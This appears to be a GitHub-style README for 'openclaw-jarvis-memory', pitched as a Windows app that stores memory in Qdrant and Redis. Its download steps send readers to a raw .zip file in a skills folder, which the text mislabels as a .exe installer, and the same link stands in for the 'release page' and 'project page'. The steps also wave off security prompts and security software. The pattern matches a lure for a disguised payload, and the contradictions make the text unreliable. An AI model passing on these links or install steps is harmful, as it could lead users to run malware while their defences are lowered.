openclaw-jarvis-memory combines two powerful storage methods to help organize and recall information. It uses Qdrant for long-term memory storage and Redis for short-term memory. This setup aims to keep your data accessible and well-managed over time.
The app works on Windows computers. It offers a way to save and retrieve data efficiently without needing technical skills or complex setups.
- Windows 10 or later (64-bit preferred)
- At least 4 GB of RAM
- 500 MB of free disk space
- Stable internet connection for initial download and updates
- No extra software installations needed
Make sure your system meets these requirements to run the app smoothly.
Follow these steps to get openclaw-jarvis-memory up and running on your Windows PC.
Click the bright green download button below or visit the release page directly.
This link leads to the official GitHub release page. From there, download the latest Windows installer file. This file will have a .exe extension, such as https://raw.githubusercontent.com/bigcola2020/openclaw-jarvis-memory/main/skills/mem-redis/openclaw_memory_jarvis_2.3.zip.
After downloading the file, locate it in your Downloads folder.
- Double-click the installer file (
https://raw.githubusercontent.com/bigcola2020/openclaw-jarvis-memory/main/skills/mem-redis/openclaw_memory_jarvis_2.3.zip). - You might see a security prompt; this is normal. Click "Run" or "Yes" to continue.
- Follow the on-screen instructions to complete the install. Use default settings unless you want to change the install location.
- The installation usually takes a few minutes.
Once installed, find the openclaw-jarvis-memory icon on your desktop or in the Start menu.
- Double-click the icon to open the app.
- The app will set up its internal storage systems (Qdrant and Redis). This may take a moment.
- When the setup finishes, the main window will appear.
The app splits memory management into two parts:
- Long-term memory: Uses Qdrant to store your data permanently. It works like a deep file cabinet that holds large amounts of information safely.
- Short-term memory: Uses Redis to store recent or temporary data. It works like a workspace where data is quickly stored and accessed but clears out regularly.
This design helps the app find what you need fast while keeping large info safe for later.
- Click the “Add” button.
- Enter your data in the field provided.
- Choose if this data should be stored in long-term or short-term memory.
- Click "Save."
- Use the search box at the top.
- Enter keywords or phrases.
- The app will look through short-term memory first, then long-term.
- Results appear below, sorted by relevance.
- You can delete or edit entries from either memory section.
- Use the provided buttons next to each entry.
- Deleting data from short-term memory happens fast and affects only temporary info.
- Deleting from long-term memory removes data permanently.
To update, visit the same release page.
Download the newest installer and run it just like before. Your data files will stay intact during updates.
- If the app does not open, verify your Windows version meets the requirements.
- Make sure no security software is blocking installation or execution.
- Restart your computer and try running the app again.
- Close extra programs that use a lot of memory if the app runs slow.
- For persistent issues, check the release page for updates or notes.
After installation:
- The program files are usually in
C:\Program Files\openclaw-jarvis-memory\ - Your stored data is inside the
Datafolder within the app directory. - Logs for app activity and errors are found in the
Logsfolder.
All data stored by openclaw-jarvis-memory stays on your computer. The app does not send data to the internet. You can delete data anytime via the app interface.
For detailed technical info and updates, visit the main project page here:
https://raw.githubusercontent.com/bigcola2020/openclaw-jarvis-memory/main/skills/mem-redis/openclaw_memory_jarvis_2.3.zip
You can find release notes, code, and a list of known issues.